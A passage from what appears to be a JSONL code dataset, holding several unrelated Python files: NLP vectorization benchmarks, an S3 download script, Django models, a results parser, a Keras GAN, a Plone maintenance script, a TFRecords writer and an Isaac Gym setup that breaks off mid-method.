tfidf_clf.predict(tfidf_vectors_test) # evaluate on test set\nprint('\\nTF-IDF/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, tfidf_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Count Vectorization\n# =============================================================================\n\ncount_vectorizer = CountVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n max_features = VECTOR_LENGTH)\ncount_vectors = count_vectorizer.fit_transform(train_text)\nprint('\\ncount vectorization. . .')\nprint('\\nTraining count_vectors_training.shape:', count_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use count_vectorizer.transform, NOT count_vectorizer.fit_transform\ncount_vectors_test = count_vectorizer.transform(test_text)\nprint('\\nTest count_vectors_test.shape:', count_vectors_test.shape)\ncount_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ncount_clf.fit(count_vectors, train_target)\ncount_pred = count_clf.predict(count_vectors_test) # evaluate on test set\nprint('\\nCount/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, count_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Hashing Vectorization\n# =============================================================================\n\nhashing_vectorizer = HashingVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n n_features = VECTOR_LENGTH)\nhashing_vectors = hashing_vectorizer.fit_transform(train_text)\nprint('\\ncount vectorization. . .')\nprint('\\nTraining hashing_vectors_training.shape:', hashing_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use hashing_vectorizer.transform, NOT hashing_vectorizer.fit_transform\nhashing_vectors_test = hashing_vectorizer.transform(test_text)\nprint('\\nTest hashing_vectors_test.shape:', hashing_vectors_test.shape)\nhashing_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\nhashing_clf.fit(hashing_vectors, train_target)\nhashing_pred = hashing_clf.predict(hashing_vectors_test) # evaluate on test set\nprint('\\nHashing/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, hashing_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Doc2Vec\n# =============================================================================\n\n# =============================================================================\n# Doc2Vec Vectorization (50 dimensions)\n# =============================================================================\n\n# doc2vec paper: https://cs.stanford.edu/~quocle/paragraph_vector.pdf\n# has a neural net with 1 hidden layer and 50 units/nodes\n# documentation at https://radimrehurek.com/gensim/models/doc2vec.html\n# https://radimrehurek.com/gensim/models/doc2vec.html#gensim.models.doc2vec.Doc2Vec\n# tutorial on GitHub: \n# https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/doc2vec-lee.ipynb\n\nprint('\\nBegin Doc2Vec Work')\ncores = multiprocessing.cpu_count()\nprint(\"\\nNumber of processor cores:\", cores)\n\ntrain_corpus = [TaggedDocument(doc, [i]) for i, doc in enumerate(train_tokens)]\n# print('train_corpus[:2]:', train_corpus[:2])\n\n# Instantiate a Doc2Vec model with a vector size with 50 words \n# and iterating over the training corpus 40 times. \n# Set the minimum word count to 2 in order to discard words \n# with very few occurrences. \n# window (int, optional) – The maximum distance between the \n# current and predicted word within a sentence.\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 50\")\nmodel_50 = Doc2Vec(train_corpus, vector_size = 50, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_50.train(train_corpus, total_examples = model_50.corpus_count, \n\tepochs = model_50.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_50_vectors = np.zeros((len(train_tokens), 50)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_50_vectors[i,] = model_50.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_50_vectors.shape:', doc2vec_50_vectors.shape)\n# print('doc2vec_50_vectors[:2]:', doc2vec_50_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_50_vectors_test = np.zeros((len(test_tokens), 50)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_50_vectors_test[i,] = model_50.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_50_vectors_test.shape:', doc2vec_50_vectors_test.shape)\n\ndoc2vec_50_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_50_clf.fit(doc2vec_50_vectors, train_target) # fit model on training set\ndoc2vec_50_pred = doc2vec_50_clf.predict(doc2vec_50_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_50/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_50_pred, average='macro'), 3)) \n\n#%%\n\n# =============================================================================\n# Doc2Vec Vectorization (100 dimensions)\n# =============================================================================\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 100\")\nmodel_100 = Doc2Vec(train_corpus, vector_size = 100, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_100.train(train_corpus, total_examples = model_100.corpus_count, \n\tepochs = model_100.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_100_vectors = np.zeros((len(train_tokens), 100)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_100_vectors[i,] = model_100.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_100_vectors.shape:', doc2vec_100_vectors.shape)\n# print('doc2vec_100_vectors[:2]:', doc2vec_100_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_100_vectors_test = np.zeros((len(test_tokens), 100)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_100_vectors_test[i,] = model_100.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_100_vectors_test.shape:', doc2vec_100_vectors_test.shape)\n\ndoc2vec_100_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_100_clf.fit(doc2vec_100_vectors, train_target) # fit model on training set\ndoc2vec_100_pred = doc2vec_100_clf.predict(doc2vec_100_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_100/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_100_pred, average='macro'), 3)) \n\n#%%\n# =============================================================================\n# Doc2Vec Vectorization (200 dimensions)\n# =============================================================================\nprint(\"\\nWorking on Doc2Vec vectorization, dimension 200\")\nmodel_200 = Doc2Vec(train_corpus, vector_size = 200, window = 4, \n\tmin_count = 2, workers = cores, epochs = 40)\n\nmodel_200.train(train_corpus, total_examples = model_200.corpus_count, \n\tepochs = model_200.epochs) # build vectorization model on training set\n\n# vectorization for the training set\ndoc2vec_200_vectors = np.zeros((len(train_tokens), 200)) # initialize numpy array\nfor i in range(0, len(train_tokens)):\n doc2vec_200_vectors[i,] = model_200.infer_vector(train_tokens[i]).transpose()\nprint('\\nTraining doc2vec_200_vectors.shape:', doc2vec_200_vectors.shape)\n# print('doc2vec_200_vectors[:2]:', doc2vec_200_vectors[:2])\n\n# vectorization for the test set\ndoc2vec_200_vectors_test = np.zeros((len(test_tokens), 200)) # initialize numpy array\nfor i in range(0, len(test_tokens)):\n doc2vec_200_vectors_test[i,] = model_200.infer_vector(test_tokens[i]).transpose()\nprint('\\nTest doc2vec_200_vectors_test.shape:', doc2vec_200_vectors_test.shape)\n\ndoc2vec_200_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ndoc2vec_200_clf.fit(doc2vec_200_vectors, train_target) # fit model on training set\ndoc2vec_200_pred = doc2vec_200_clf.predict(doc2vec_200_vectors_test) # evaluate on test set\nprint('\\nDoc2Vec_200/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_200_pred, average='macro'), 3)) \n\n#%%\n# =============================================================================\n# Print Results\n# =============================================================================\n\nprint('\\n\\n------------------------------------------------------------------------')\nprint('\\nTF-IDF/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, tfidf_pred, average='macro'), 3))\nprint('\\nCount/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, count_pred, average='macro'), 3))\nprint('\\nHashing/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, hashing_pred, average='macro'), 3))\nprint('\\nDoc2Vec_50/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_50_pred, average='macro'), 3)) \nprint('\\nDoc2Vec_100/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_100_pred, average='macro'), 3)) \nprint('\\nDoc2Vec_200/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, doc2vec_200_pred, average='macro'), 3)) \nprint('\\n------------------------------------------------------------------------')","sub_path":"economics/run_economics.py","file_name":"run_economics.py","file_ext":"py","file_size_in_byte":24163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353198100","text":"# Kills in current instance.\n# By Robert Cordingly\n\nimport boto3\nimport sys\n\ndef listInstances(ec2Client):\n instances = []\n response = ec2Client.describe_instances()\n for reservation in response[\"Reservations\"]:\n for instance in reservation[\"Instances\"]:\n instances.append(instance)\n return instances\n\ndef findOurInstance(ec2Client, jobID):\n instances = listInstances(ec2Client)\n for instance in instances:\n if 'Tags' in instance and 'State' in instance:\n if instance['State']['Name'] != 'pending' and instance['State']['Name'] != 'running':\n continue\n tags = instance['Tags']\n for keyPair in tags:\n if keyPair['Key'] == 'jobID' and keyPair['Value'] == str(jobID):\n return instance\n return None\n\ndef terminateInstance(ec2Client, ec2Resource, ourInstance):\n if (ourInstance is not None):\n instance = ec2Resource.Instance(ourInstance['InstanceId'])\n instance.terminate()\n\npath = sys.argv[1]\njobID = sys.argv[2]\naccessKey = sys.argv[3]\nsecretKey = sys.argv[4]\n\nif (len(sys.argv) == 6):\n\tsessionToken = sys.argv[5]\nelse:\n\tsessionToken = \"\"\n\nbotoSession = boto3.Session (\n\taws_access_key_id = accessKey,\n\taws_secret_access_key = secretKey,\n\taws_session_token = sessionToken, \n\tregion_name = 'us-east-1'\n)\n\ns3Client = botoSession.client('s3')\ns3Client.download_file('easyrl-' + str(jobID), path, path)","sub_path":"lambda/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91831054","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nCHOICES_TIPO_USER = (\n ('USU', 'USUÁRIO'),\n ('CAN', 'CANDIDATO'),\n ('CLI', 'CLIENTE'),\n)\n\nDEFAULT_THEME_ANONYMOUS = ('smoothness', \"Smoothness\")\nCHOICES_THEME = (\n ('spa', \"SPA WEB\"),\n ('cupertino', \"Cupertino\"),\n ('dark-hive', \"Dark Hive\"),\n ('eggplant', \"Eggplant\"),\n ('flick', \"Flick\"),\n ('overcast', \"Overcast\"),\n ('pepper-grinder', \"Pepper Grinder\"),\n ('redmond', \"Redmond\"),\n ('smoothness', \"Smoothness\"),\n ('south-street', \"South Street\"),\n ('start', \"Start\"),\n ('sunny', \"Sunny\"),\n ('ui-darkness', \"UI darkness\"),\n ('ui-lightness', \"UI lightness\"),\n ('blitzer', \"Blitzer\"),\n ('humanity', \"Humanity\"),\n ('hot-sneaks', \"Hot Sneaks\"),\n ('excite-bike', \"Excite Bike\"),\n ('vader', \"Vader\"),\n ('dot-luv', \"Dot Luv\"),\n ('mint-choc', \"Mint Choc\"),\n ('black-tie', \"Black Tie\"),\n ('trontastic', \"Trontastic\"),\n ('swanky-purse', \"Swanky Purse\"),\n \n)\n\nclass PerfilUser(models.Model):\n user = models.OneToOneField(User, primary_key=True)\n tipo = models.CharField(max_length=3, choices=CHOICES_TIPO_USER)\n tema = models.CharField(max_length=15)\n \n def get_label(self):\n return dict(CHOICES_THEME)[self.tema]\n ","sub_path":"lab_django1_4/ui_theme_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319212478","text":"import os\nimport glob\nimport sys\nimport csv\nimport logging\n\nif sys.version_info[0] < 3:\n print('You must use Python 3')\n\n exit()\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n handlers=[\n logging.FileHandler('parser.log'),\n logging.StreamHandler()\n ]\n)\n\nDIRECTORY = '../data/'\n\n# Generate a CSV file with the results\noutput = csv.writer(open('results.csv', 'w'), delimiter=';')\n\nheader = [\n 'forwarders',\n 'clients',\n 'processes',\n 'layout',\n 'spatiality',\n 'odirect',\n 'stonewall',\n 'request',\n 'total',\n 'operation',\n 'time',\n 'transfered',\n 'bandwidth'\n]\n\noutput.writerow(header)\n\n# Get all .bash files\nexperiments = sorted([f for f in glob.glob(DIRECTORY + \"*.slurm\", recursive=True)])\n\nfor experiment in experiments:\n logging.info('parsing {}'.format(experiment))\n\n # Open the file and get the configuration\n with open(experiment) as f:\n lines = f.readlines()\n\n # Ge the number of processes\n slurm_processes = None\n slurm_forwarders = None\n slurm_clients = None\n\n for line in lines:\n if 'EXPERIMENT_NUMBER_PROCESSES' in line and slurm_processes is None:\n slurm_processes = int(line.strip().split('=')[1])\n continue\n\n if 'EXPERIMENT_NUMBER_FORWARDERS' in line and slurm_forwarders is None:\n slurm_forwarders = int(line.strip().split('=')[1])\n continue\n\n if 'EXPERIMENT_NUMBER_CLIENTS' in line and slurm_clients is None:\n slurm_clients = int(line.strip().split('=')[1])\n continue\n\n # Get the experiment ID\n\n experiment_id = (experiment.split('-')[1]).split('.')[0]\n\n # Get the .time file\n path = '{}/FORGE-{}-*/emulation.time'.format(DIRECTORY, experiment_id)\n\n files = glob.glob(path)\n\n if not files:\n logging.warning('missing .time file for experiment {}'.format(experiment_id))\n else:\n for filename in files:\n with open(filename, 'r') as f:\n lines = f.readlines()\n\n json_operation = ''\n\n json_write_time = None\n json_read_time = None\n\n for line in lines:\n if 'forwarders' in line:\n json_forwarders = int(line.strip().split()[1])\n continue\n if 'clients' in line:\n json_clients = int(line.strip().split()[1])\n continue\n if 'layout' in line:\n json_layout = int(line.strip().split()[1])\n continue\n if 'spatiality' in line:\n json_spatiality = int(line.strip().split()[1])\n continue\n if 'odirect' in line:\n json_odirect = int(line.strip().split()[1])\n continue\n if 'stonewall' in line:\n json_stonewall = int(line.strip().split()[1])\n continue\n if 'request' in line:\n json_request = int(line.strip().split()[1])\n continue\n if 'total' in line:\n json_total = int(line.strip().split()[1])\n continue\n\n if 'WRITE' in line:\n json_operation = 'write'\n continue\n if 'READ' in line:\n json_operation = 'read'\n continue\n\n if 'max' in line and json_operation == 'write':\n json_write_time = float(line.strip().split(':')[1].split()[0])\n continue\n if 'data' in line and json_operation == 'write':\n json_write_transfered = float(line.strip().split(':')[1].split()[0])\n continue\n if 'bandwidth' in line and json_operation == 'write':\n json_write_bandwidth = float(line.strip().split(':')[1].split()[0])\n continue\n\n if 'max' in line and json_operation == 'read':\n json_read_time = float(line.strip().split(':')[1].split()[0])\n continue\n if 'data' in line and json_operation == 'read':\n json_read_transfered = float(line.strip().split(':')[1].split()[0])\n continue\n if 'bandwidth' in line and json_operation == 'read':\n json_read_bandwidth = float(line.strip().split(':')[1].split()[0])\n continue\n\n if json_write_time:\n write_results = [\n slurm_forwarders,\n slurm_clients,\n json_clients,\n json_layout,\n json_spatiality,\n json_odirect,\n json_stonewall,\n json_request,\n json_total,\n 'write',\n json_write_time,\n json_write_transfered,\n json_write_bandwidth\n ]\n\n output.writerow(write_results)\n\n if json_read_time:\n read_results = [\n slurm_forwarders,\n slurm_clients,\n json_clients,\n json_layout,\n json_spatiality,\n json_odirect,\n json_stonewall,\n json_request,\n json_total,\n 'read',\n json_read_time,\n json_read_transfered,\n json_read_bandwidth\n ]\n\n output.writerow(read_results)\n","sub_path":"run/output/marenostrum-4/results/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199357533","text":"#Using sys for command-line tools.\n#add.py\nimport sys\n\ndef adding(*y):\n sum = 0.0\n for x in y:\n try:\n sum+=float(x)\n except Exception:\n continue\n return sum\n\nif len(sys.argv) <= 1:\n print(\" Usage: python3 add.py < nums >\\n Add some numbers together\")\nelse:\n print(adding(*sys.argv))","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502938516","text":"import collections\nimport typing\n\nimport attr\n\nimport tman.entities.competitor as competitor_entities\n\n\n@attr.s\nclass Competitor(competitor_entities.Competitor):\n pool = attr.ib(\n type=typing.Optional[int],\n validator=attr.validators.optional(\n attr.validators.instance_of(int),\n ),\n default=None,\n )\n lot = attr.ib(\n type=typing.Optional[int],\n validator=attr.validators.optional(\n attr.validators.instance_of(int),\n ),\n default=None,\n )\n\n @classmethod\n def from_data(cls, data: dict) -> \"Competitor\":\n return cls(\n id=data['id'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n birthday=data['birthday'],\n gender=data['gender'],\n club_id=data['club_id'],\n pool=data['pool'],\n lot=data['lot'],\n )\n\n\nclass PhaseCompetitors(collections.UserList):\n def append(\n self,\n item: competitor_entities.Competitor,\n pool: int=None,\n lot: int=None,\n ):\n self.data.append(\n Competitor(\n **attr.asdict(item),\n pool=pool,\n lot=lot,\n )\n )\n\n def remove(\n self,\n item: typing.Union[Competitor, competitor_entities.Competitor],\n ):\n if isinstance(item, Competitor):\n return self.data.remove(item)\n else:\n to_be_removed = next(\n (\n c for c in self.data\n if c.id == item.id\n ),\n None,\n )\n if not to_be_removed:\n raise ValueError('Competitor not in list')\n\n self.data.remove(to_be_removed)\n","sub_path":"tman_entities/tman/entities/phase/competitor.py","file_name":"competitor.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308082567","text":"from write_tfrecords import write_seg_data_to_tfrecords, load_name\nfrom read_data import DataReader\nimport os\n\ntrain_data_path = 'E:/data/sig17_seg/v_based_3level/train/'\ntest_data_path = 'E:/data/sig17_seg/v_based_3level/test/'\n\noutput_path = 'E:/data/TFRecords/'\n\ntrain_label_path = 'D:/data/sig17_seg_benchmark/segs/train/vbased/'\ntest_label_path = 'D:/data/sig17_seg_benchmark/segs/test/vbased/'\n\ntrain_name = []\ntest_name = []\n\ntrain_name = load_name(\"D:/data/sig17_seg/MDGCNN_dataset/train.txt\")\ntest_name = load_name(\"D:/data/sig17_seg/MDGCNN_dataset/test.txt\")\n\nwrite_seg_data_to_tfrecords(train_data_path, train_label_path, output_path, 'seg_train_3level_tan', train_name, start_level=0, level_num=3)\nwrite_seg_data_to_tfrecords(test_data_path, test_label_path, output_path, 'seg_test_3level_tan', test_name, start_level=0, level_num=3)\n","sub_path":"PFCNN/Generate_Dataset/HumanSeg_dataset.py","file_name":"HumanSeg_dataset.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189259478","text":"import numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Flatten, Reshape, LeakyReLU, Input, BatchNormalization,Dropout\nfrom keras.optimizers import Adam\nfrom keras.regularizers import L1L2\nimport matplotlib.pyplot as plt\n\n\nclass GAN:\n def __init__(self):\n # shape of input image\n self.image_shape = (28, 28, 1)\n self.noise_shape = (20,)\n self.optimiser = Adam(0.0002, 0.5)\n\n # now we create both our networks\n\n self.generator = self.build_generator()\n self.generator.compile(optimizer=self.optimiser, loss='binary_crossentropy')\n\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(optimizer=self.optimiser, loss='binary_crossentropy', metrics=['accuracy'])\n\n noise = Input(self.noise_shape)\n img = self.generator(noise)\n self.discriminator.trainable = False\n\n validity = self.discriminator(img)\n\n self.combined = Model(noise, validity) # 讓假資料流進 gen\n self.combined.compile(optimizer=self.optimiser, loss='binary_crossentropy')\n\n def build_generator(self):\n # the generator will be a fully connected network\n # with input noise vector of shape (20,)\n # the output of the generator will be a 28x28 image\n \n model = Sequential()\n model.add(Dense(256, input_shape=self.noise_shape))\n model.add(LeakyReLU())\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.50))\n\n model.add(Dense(512))\n model.add(LeakyReLU())\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(0.50))\n\n model.add(Dense(784, activation='tanh'))\n model.add(Reshape(self.image_shape))\n print('Generator model : ')\n print(model.summary())\n\n noise = Input(self.noise_shape)\n gen_img = model(noise)\n\n return Model(noise, gen_img)\n\n def build_discriminator(self):\n # this is a simple FCN\n # input for the discriminator is a 28x28 image\n\n model = Sequential()\n model.add(Flatten(input_shape=self.image_shape)) # 28 x 28 變成一維\n\n model.add(Dense(512))\n model.add(LeakyReLU())\n # model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n model.add(Dense(256))\n model.add(LeakyReLU())\n # model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n model.add(Dense(1, activation='sigmoid')) # 輸出 1\n print('Discriminator model : ')\n print(model.summary())\n\n img = Input(self.image_shape)\n validity = model(img)\n\n return Model(img, validity)\n\n def train(self, X, epochs=1, batch_size=64):\n\n \n X_train = (X.astype(np.float32)-127.5) / 127.5\n X_train = X_train.reshape((X.shape[0], 28, 28, 1))\n \n \n\n for epoch in range(epochs + 1):\n # -----------train discriminator ------------\n \n idx = np.random.randint(0, X.shape[0], batch_size) # 隨機抓 64 筆,idx 是一個nd.array\n real_imgs = X_train[idx]\n noise = np.random.normal(0, 1, (batch_size, 20)) # { 20 } x 64\n fakes = self.generator.predict(noise) # 從 noise 裡面生成資料\n\n ####\n\n ################# real_imgs \n # Dataset # ------------------|\n ################# | #################\n # |——————————> # DIS #\n # noise ################# fakes | #################\n # —————————————— # GEN # ------------------|\n #################\n\n ####\n\n d_loss_real = self.discriminator.train_on_batch(real_imgs, np.ones((batch_size, 1))) # 先用真是資料 train dis, 再假資料過一遍\n d_loss_fake = self.discriminator.train_on_batch(fakes, np.zeros((batch_size, 1))) # data match label\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake) # 看大家的過兩次分別的 loss\n \n # print(d_loss_real)\n # print(\"============\")\n # print(d_loss_fake)\n # print(np.zeros((64, 1)))\n\n # --------------train generator -------------------\n\n # Train the generator (to have the discriminator label samples as valid)\n # try to fool the discriminator\n noise = np.random.normal(0, 1, (batch_size, 20))\n valid_y = [1] * batch_size\n g_loss = self.combined.train_on_batch(noise, valid_y)\n # Hung-Yi Li : 把 gen 和 dis 合起來看作是一個巨大的 network,input 是 vector,就是 noise\n # 因此理解上是 input 了一張由 gen 產生的圖片,實際上是 一個 vector。 combined 就是合併兩個。\n \n print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (epoch, d_loss[0], 100 * d_loss[1], g_loss))\n\n if epoch % 1000 == 0:\n self.save_imgs(epoch)\n\n\n def save_imgs(self, epoch):\n r, c = 3, 3\n noise = np.random.normal(0, 1, (r * c, 20))\n gen_imgs = self.generator.predict(noise)\n\n # Rescale images 0 - 1\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n fig, axs = plt.subplots(r, c)\n cnt = 0\n for i in range(r):\n for j in range(c):\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap=None) \n axs[i, j].axis('off')\n cnt += 1\n fig.savefig(\"mona_lisa%d.png\" % epoch)\n plt.close()\n\n\nif __name__ == '__main__':\n gan = GAN()\n mona_lisa = np.load(\"mona_lisa.npy\")\n gan.train(X=mona_lisa)\n","sub_path":"BasicGAN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386283703","text":"from opengever.base.behaviors.lifecycle import ILifeCycleMarker\nfrom opengever.base.behaviors.lifecycle import ILifeCycle\nfrom opengever.maintenance.debughelpers import setup_app\nfrom opengever.maintenance.debughelpers import setup_option_parser\nfrom opengever.maintenance.debughelpers import setup_plone\nfrom plone import api\nimport logging\nimport sys\nimport transaction\n\n\nlogger = logging.getLogger('opengever.maintenance')\nhandler = logging.StreamHandler(stream=sys.stdout)\nlogging.root.addHandler(handler)\nlogging.root.setLevel(logging.INFO)\n\n\nclass CustodyPeriodResetter(object):\n \"\"\"Resets the custody periods\n \"\"\"\n\n def __init__(self, plone, options):\n self.plone = plone\n self.options = options\n self.catalog = api.portal.get_tool('portal_catalog')\n\n def run(self):\n for item in self.catalog.unrestrictedSearchResults(\n object_provides=[ILifeCycleMarker.__identifier__]):\n obj = item.getObject()\n\n ILifeCycle(obj).custody_periods = 0\n\n\ndef main():\n app = setup_app()\n parser = setup_option_parser()\n parser.add_option(\"-n\", dest=\"dry_run\", action=\"store_true\", default=False)\n options, args = parser.parse_args()\n\n if options.dry_run:\n logger.warn('transaction doomed because we are in dry-mode.')\n transaction.doom()\n\n plone = setup_plone(app, options)\n CustodyPeriodResetter(plone, options).run()\n if options.dry_run:\n logger.warn('skipping commit because we are in dry-mode.')\n else:\n transaction.commit()\n logger.info('done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"opengever/maintenance/scripts/reset_custody_period.py","file_name":"reset_custody_period.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302321918","text":"import glob\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport scipy.spatial as spatial\nfrom isaacgym import gymapi, gymtorch\nfrom isaacgym.torch_utils import to_torch, torch_rand_float\nfrom rlgpu.utils.config import (\n get_args,\n load_cfg,\n parse_sim_params,\n set_np_formatting,\n set_seed,\n)\nimport torch\n\n\nclass GeneratePoses:\n def __init__(\n self, args, cfg, sim_params, physics_engine, device_type, device_id, headless\n ):\n self.gym = gymapi.acquire_gym()\n self.args = args\n self.cfg = cfg\n self.headless = headless\n self.sim_params = sim_params\n self.physics_engine = physics_engine\n self.device_type = device_type\n self.device_id = device_id\n self.device = \"cpu\"\n if self.device_type == \"cuda\" or self.device_type == \"GPU\":\n self.device = \"cuda\" + \":\" + str(self.device_id)\n self.task_name = self.args.task.lower()\n\n self.spacing = self.cfg[\"env\"][\"env_spacing\"]\n\n self.up_axis = \"z\"\n self.up_axis_idx = 2\n\n self.visual_attachments = self.cfg[\"robot\"][\"visual_attachments\"]\n self.dof_damping = self.cfg[\"robot\"][\"dof_damping\"]\n self.dof_stiffness = self.cfg[\"robot\"][\"dof_stiffness\"]\n\n self.num_dofs = self.cfg[\"env\"][\"num_dofs\"]\n\n self.workspace_size = self.cfg[\"robot\"][\"workspace_size\"]\n self.curriculum_sizes = self.cfg[\"robot\"][\"curriculum_sizes\"]\n\n if not self.args.record and not self.args.split:\n raise ValueError(\" *** Need to select either --record or --split\")\n\n if self.args.record and not self.args.num_samples:\n raise ValueError(\n \" *** Need to specify the --num_samples to record (1 = 1 million samples)\"\n )\n\n if self.args.split and not self.args.headless:\n raise ValueError(\n \" *** Need to be in headless mode to split the data into curriculums\"\n )\n\n self.num_envs = self.args.num_envs\n\n self.create_sim()\n\n def create_sim(self):\n # allocates which device will simulate and which device will render the scene and simulation type to be used\n self.sim_params.up_axis = gymapi.UP_AXIS_Z\n self.sim_params.gravity.x = 0\n self.sim_params.gravity.y = 0\n self.sim_params.gravity.z = -9.81\n self.sim_params.use_gpu_pipeline = False\n if args.use_gpu_pipeline:\n print(\"WARNING: Forcing CPU pipeline.\")\n self.sim = self.gym.create_sim(\n self.device_id, self.device_id, self.physics_engine, self.sim_params\n )\n if self.sim is None:\n print(\"*** Failed to create sim\")\n quit()\n self._create_ground_plane()\n self._create_envs(spacing=self.spacing, num_per_row=int(np.sqrt(self.num_envs)))\n\n def _create_ground_plane(self):\n plane_params = gymapi.PlaneParams()\n plane_params.normal = gymapi.Vec3(0.0, 0.0, 1.0)\n self.gym.add_ground(self.sim, plane_params)\n\n # create viewer\n if self.headless == False:\n self.viewer = self.gym.create_viewer(self.sim, gymapi.CameraProperties())\n cam_pos = gymapi.Vec3(np.sqrt(self.num_envs) * self.spacing * 2, np.sqrt(self.num_envs) * self.spacing * 2, 8.0)\n cam_target = gymapi.Vec3(np.sqrt(self.num_envs), np.sqrt(self.num_envs), -8.0)\n self.gym.viewer_camera_look_at(self.viewer, None, cam_pos, cam_target)\n if self.viewer is None:\n print(\"*** Failed to create viewer\")\n quit()\n\n def _create_envs(self, spacing, num_per_row):\n # set up the env grid (it is a 3-dimensional box constructed by the lower and upper)\n lower = gymapi.Vec3(-spacing, -spacing, 0.0)\n upper = gymapi.Vec3(spacing, spacing, spacing)\n\n # load robot assets\n asset_root = \"../../assets\"\n robot_asset_file = f\"urdf/{self.task_name}/{self.task_name}.urdf\"\n\n robot_asset_options = gymapi.AssetOptions()\n robot_asset_options.fix_base_link = True\n robot_asset_options.flip_visual_attachments = self.visual_attachments\n robot_asset_options.collapse_fixed_joints = False\n robot_asset_options.disable_gravity = True\n robot_asset_options.thickness = 0.001\n robot_asset_options.use_mesh_materials = True\n\n print(\"Loading asset '%s' from '%s'\" % (robot_asset_file, asset_root))\n robot_asset = self.gym.load_asset(\n self.sim, asset_root, robot_asset_file, robot_asset_options\n )\n\n robot_dof_stiffness = to_torch(self.dof_stiffness, dtype=torch.float)\n robot_dof_damping = to_torch(self.dof_damping, dtype=torch.float)\n num_robot_bodies = self.gym.get_asset_rigid_body_count(robot_asset)\n num_robot_dofs = self.gym.get_asset_dof_count(robot_asset)\n\n 